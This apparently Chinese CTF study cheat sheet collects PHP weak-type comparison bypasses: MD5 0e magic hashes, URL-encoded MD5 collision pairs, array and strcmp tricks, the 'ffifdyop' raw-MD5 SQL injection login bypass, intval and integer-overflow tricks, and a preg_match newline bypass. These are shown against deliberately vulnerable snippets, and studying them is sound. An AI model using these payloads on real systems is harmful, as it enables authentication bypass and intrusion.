==弱比较
<?php
if (isset($_POST['a']) and isset($_POST['b'])) {
if ($_POST['a'] != $_POST['b']) {
if (md5($_POST['a']) == md5($_POST['b']))
echo 'flag';
else
echo 'you are wrong';
}
else
echo "请输入不同的a,b值";
}
payload1-传数组
a[]=111&b[]=222
payload2-传入两个md5加密后是0e开头的字符串(字符串必须是纯数字)
a=s878926199a&b=s155964671a
===强比较
除了值之外,两边类型也必须相等
$a=1;
$a==="1"; //flase
$a=="1"; //true
<?php
if (isset($_POST['a']) and isset($_POST['b'])) {
if ($_POST['a'] != $_POST['b']) {
if (md5($_POST['a']) === md5($_POST['b']))
echo 'flag';
else
echo 'you are wrong';
}
else
echo "请输入不同的a,b值";
}
if ((string)$_POST['a'] !== (string)$_POST['b'] && md5($_POST['a']) === md5($_POST['b'])) {
echo `$cmd`;
} else {
echo ("nonono");
} //这种只能使用payload2
payload1-传数组
a[]=111&b[]=222
payload2-用md5碰撞,传入两个md5加密后结果相同的字符串(需要在bp中传参,hackbar中涉及自动编码问题不可行)
//因为有不可见字符,已用urlencode加密
1%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%A3njn%FD%1A%CB%3A%29Wr%02En%CE%89%9A%E3%8EF%F1%BE%E9%EE3%0E%82%2A%95%23%0D%FA%CE%1C%F2%C4P%C2%B7s%0F%C8t%F28%FAU%AD%2C%EB%1D%D8%D2%00%8C%3B%FCN%C9b4%DB%AC%17%A8%BF%3Fh%84i%F4%1E%B5Q%7B%FC%B9RuJ%60%B4%0D7%F9%F9%00%1E%C1%1B%16%C9M%2A%7D%B2%BBoW%02%7D%8F%7F%C0qT%D0%CF%3A%9DFH%F1%25%AC%DF%FA%C4G%27uW%CFNB%E7%EF%B0
1%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%A3njn%FD%1A%CB%3A%29Wr%02En%CE%89%9A%E3%8E%C6%F1%BE%E9%EE3%0E%82%2A%95%23%0D%FA%CE%1C%F2%C4P%C2%B7s%0F%C8t%F28zV%AD%2C%EB%1D%D8%D2%00%8C%3B%FCN%C9%E24%DB%AC%17%A8%BF%3Fh%84i%F4%1E%B5Q%7B%FC%B9RuJ%60%B4%0D%B7%F9%F9%00%1E%C1%1B%16%C9M%2A%7D%B2%BBoW%02%7D%8F%7F%C0qT%D0%CF%3A%1DFH%F1%25%AC%DF%FA%C4G%27uW%CF%CEB%E7%EF%B0
a=%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%00%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%55%5d%83%60%fb%5f%07%fe%a2&b=%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%02%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%d5%5d%83%60%fb%5f%07%fe%a2
$c==md5($c)
payload-本身弱比较
c=0e215962017
//0e215962017的md5值为0e291242476940776845150308577824
strcmp
strcmp($a,$b) 比较两个字符串是否相等,相等返回0,出错也返回0,因此传入数组使其出错
if(!strcmp($a, $flag)){
echo $flag;
}
payload
a[]=1
假如sql中查询语句为select * from 'admin' where password=md5($pass,true)
mysql会把hex当ascii解释,因此如果某个字符串的md5开头为`'or'数字`格式,就可以绕过验证
ffifdyop被md5加密后为:'or'6É]é!r,ùíb
数组溢出
if($array[++$c]=1){
if($array[]=1){
echo "nonono";
}
echo "success";
}
// 两条均为赋值语句,要让array数组中下标为 $c+1 赋值成功,下标为 $c+2 赋值失败
// 利用数组溢出,让$c+2时刚好溢出,PHP32位最大值2147483647,64位最大值为9223372036854775807
// 因此让$c=9223372036854775806(以64位为例)
intval绕过(科学计数法)
if (isset($_GET['num'])){
$num = $_GET['num'];
if(intval($num) < 2020 && intval($num + 1) > 2021){
echo "success.</br>";
}else{
die("no");
}
}else{
die("no");
}
// 利用科学计数法绕过,intval('1e4')为1,而intval('1e4'+1)为10001
// 因此让$num=1e4(或者'1e4')
弱类型整数大小比较绕过
$temp = $_GET['password'];
is_numeric($temp)?die("no numeric"):NULL;
if($temp>1336){
echo $flag;
}
// 用非数字弱类型绕过:password=1337a
// 或者传递数组:password[]=1
_检测绕过 + preg_match绕过
$query = $_SERVER['QUERY_STRING'];
if( substr_count($query, '_') !== 0 || substr_count($query, '%5f') != 0 ){
die('Y0u are So cutE!');
}
if($_GET['b_u_p_t'] !== '23333' && preg_match('/^23333$/', $_GET['b_u_p_t'])){
echo "you are going to the next ~";
}
// 第一个点:需要传 b_u_p_t 变量,但是传递的变量又不能包括_
// 可以用 空格( )、加号(+)、小数点(.)、或者它们的url编码绕过
// 第二个点:传入的参数不能为23333但是又必须被正则头尾匹配
// 利用换行符%0a绕过
// payload:b+u+p+t=23333%0a
额外补充:
http://localhost/aaa/index.php?p=222&q=333
$_SERVER['QUERY_STRING'] = "p=222&q=333";
$_SERVER['REQUEST_URI']= "/aaa/index.php?p=222&q=333";
$_SERVER['SCRIPT_NAME']= "/aaa/index.php";
$_SERVER['PHP_SELF']= "/aaa/index.php";
0e开头MD5值小结
sosei3f
0ea0851992f2e29b
QNKCDZO
0e830400451993494058024219903391
s878926199a
0e545993274517709034328855841020
s155964671a
0e342768416822451524974117254469